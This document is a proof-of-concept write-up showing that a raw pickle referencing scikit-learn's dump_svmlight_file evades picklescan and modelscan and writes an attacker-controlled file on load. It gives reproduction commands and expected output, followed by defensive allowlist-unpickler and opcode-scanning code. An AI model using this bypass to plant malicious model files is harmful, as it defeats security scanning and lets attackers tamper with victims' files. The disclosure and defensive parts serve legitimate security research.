scikit-learn dump_svmlight_file pickle-scanner bypass PoC
This PoC builds a raw pickle that uses a direct STACK_GLOBAL reference to:
module = "sklearn.datasets._svmlight_format_io"
name = "dump_svmlight_file"
Both picklescan==1.0.4 and modelscan==0.8.8 report the pickle as clean. A plain pickle.load() then creates /tmp/mfv_sklearn_dump_svmlight_scanner_bypass_20260624.svm with attacker-controlled SVMlight/libsvm content.
Run:
python3 -m venv /tmp/sklearn-dump-svmlight-scanner-bypass-venv
/tmp/sklearn-dump-svmlight-scanner-bypass-venv/bin/python -m pip install --upgrade pip
/tmp/sklearn-dump-svmlight-scanner-bypass-venv/bin/python -m pip install -r requirements.txt
/tmp/sklearn-dump-svmlight-scanner-bypass-venv/bin/python reproduce_sklearn_dump_svmlight_scanner_bypass.py
Expected:
picklescan_clean=True
modelscan_clean=True
load_success=True
marker_exists=True
content_matches=True
REPRO_OK
The payload is generated with raw pickle opcodes and does not contain builtins.getattr.
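As an added defensive check (not part of this PoC or of either scanner), the following inspects a pickle's opcode stream for every GLOBAL/STACK_GLOBAL reference and loads pickles through an allowlisting Unpickler, so a reference to sklearn.datasets._svmlight_format_io.dump_svmlight_file is rejected regardless of which modules a denylist knows about. ALLOWED_GLOBALS, the helper names and the constructed sample pickles (which hold only a bare reference and invoke nothing) are assumptions.

```python
import io
import pickle
import pickletools

# Assumption: the only globals this loader may resolve; in practice, exactly the
# classes a legitimate artifact needs and nothing more.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}
STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING", "UNICODE",
              "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}
MEMO_OPS = {"MEMOIZE", "PUT", "BINPUT", "LONG_BINPUT"}

def referenced_globals(data):
    """Every (module, name) the pickle resolves via GLOBAL or STACK_GLOBAL, found
    by walking the opcode stream, so nothing is imported or called. STACK_GLOBAL
    pops its operands, so only plain string pushes right before it are trusted."""
    refs, pending = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in STRING_OPS:
            pending.append(arg)
        elif op.name == "GLOBAL":
            refs.append(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL":  # unresolved operands are flagged, not ignored
            refs.append(tuple(pending[-2:]) if len(pending) >= 2
                        else ("<unresolved>", "<unresolved>"))
            pending = []
        elif op.name not in MEMO_OPS:
            pending = []  # another opcode may have consumed the pushed strings
    return refs

class AllowlistUnpickler(pickle.Unpickler):
    # find_class is called for GLOBAL and STACK_GLOBAL alike, before any import.
    def find_class(self, module, name):
        if (module, name) not in ALLOWED_GLOBALS:
            raise pickle.UnpicklingError(f"{module}.{name} is not allowlisted")
        return super().find_class(module, name)

def safe_loads(data):
    return AllowlistUnpickler(io.BytesIO(data)).load()

def global_reference_pickle(module, name):
    """Constructed sample: a protocol-4 pickle holding one STACK_GLOBAL reference
    and no call, so loading it merely returns the referenced object."""
    s = lambda t: pickle.SHORT_BINUNICODE + bytes([len(t.encode())]) + t.encode()
    return pickle.PROTO + b"\x04" + s(module) + s(name) + pickle.STACK_GLOBAL + pickle.STOP

# Constructed inputs: a plain dict, an allowlisted class, and the PoC's reference.
BENIGN_PICKLE = pickle.dumps({"a": [1, 2]})
ALLOWED_REFERENCE = global_reference_pickle("collections", "OrderedDict")
BYPASS_REFERENCE = global_reference_pickle(
    "sklearn.datasets._svmlight_format_io", "dump_svmlight_file")
```

Anything referenced_globals returns that is not in ALLOWED_GLOBALS (including the "<unresolved>" marker) should fail the artifact, and safe_loads refuses such a global before it is imported.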